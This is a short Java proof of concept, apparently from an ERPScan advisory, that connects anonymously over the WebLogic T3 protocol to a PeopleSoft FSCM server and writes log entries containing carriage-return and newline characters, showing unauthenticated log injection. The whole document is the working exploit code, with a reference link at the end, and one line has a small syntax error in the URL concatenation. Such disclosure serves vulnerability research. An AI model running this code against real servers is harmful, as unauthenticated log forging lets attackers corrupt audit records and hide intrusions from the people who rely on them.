PoC
static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
p.put(Context.PROVIDER_URL, "t3://"PS_SERVER_IP+":"+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
Object obj = ctx.lookup("weblogic.common.T3Services");
Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
T3ServicesDef h = (T3ServicesDef) o;
h.log().log("ERPScan_1\n\rERPScan_2");
h.log().info("ERPScan_3\n\rERPScan_4");
h.log().error("ERPScan_5\n\rERPScan_6");
h.log().warning("ERPScan_7\n\rERPScan_8");
h.log().debug("ERPScan_9\n\rERPScan_10");
return false;
}
[Reference] https://erpscan.com/advisories/erpscan-17-042-anonymous-log-injection-in-fscm/